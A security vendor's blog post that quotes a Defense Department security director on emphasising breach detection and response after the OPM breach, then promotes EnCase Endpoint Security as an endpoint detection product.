This week, in response to the OPM breach, Chris Carpenter, the Security Director at the Office of the Secretary of Defense called for an emphasis on detection and response capabilities.
The reason, Carpenter noted, is that there is a clear window of opportunity within which to find attackers inside the network and cut off their access before they have a chance to exfiltrate data. This is backed up by the fact that the vast majority of breach disclosures note that the attackers had been inside for a period of time prior the data exfiltration.
We can’t prevent all breaches. Now what?
Carpenter explained:
When we start operating from an assumption that breaches cannot always be prevented,
we can put more emphasis on detection and response. This actually can save us time and
money.
When a system is breached it takes time for the attackers to identify or reach the
resources they are after on the network. During the time that it takes for them to learn the
network and find what they are after, detection would still protect valuable information.
Even after the attackers identify the information they must exfiltrate it. This is another
opportunity for detection. Early detection of compromise minimizes the amount of
information lost, cost of repair and reputational damage. With that type of benefit,
it should be easy to get the resource for detection systems, even in
budget-constrained environments. It's not, though.
opportunity for detection. Early detection of compromise minimizes the amount of
information lost, cost of repair and reputational damage. With that type of benefit,
it should be easy to get the resource for detection systems, even in
budget-constrained environments. It's not, though.
The number one thing organizations have to assume is that attackers may already be on their endpoints, undetected, looking for sensitive data to steal. That means that they’ve already bypassed security controls, which are typically at the gateway or are signature-based, and those controls are useless once the invaders are inside and user accounts have been compromised.
But there’s hope
What Carpenter is calling for is detection and response. And that's what we do at the endpoint--what Gartner calls endpoint detection and response (EDR). Every action leaves a breadcrumb that can be seen by EnCase® Endpoint Security with our unparalleled endpoint visibility. It’s a simple fact: there is no way for an attacker to compromise a system without leaving a trace either on the disk, in memory or in the registry.Having comprehensive endpoint visibility is the only way to ensure you have the capability to root out an attacker, no matter how well they think they’ve hidden their tracks. EnCase Endpoint Security gives you the industry’s deepest and most complete endpoint visibility—even down below the operating system level. I invite you to take a look and share your own ideas in the Comments section below.
No comments :
Post a Comment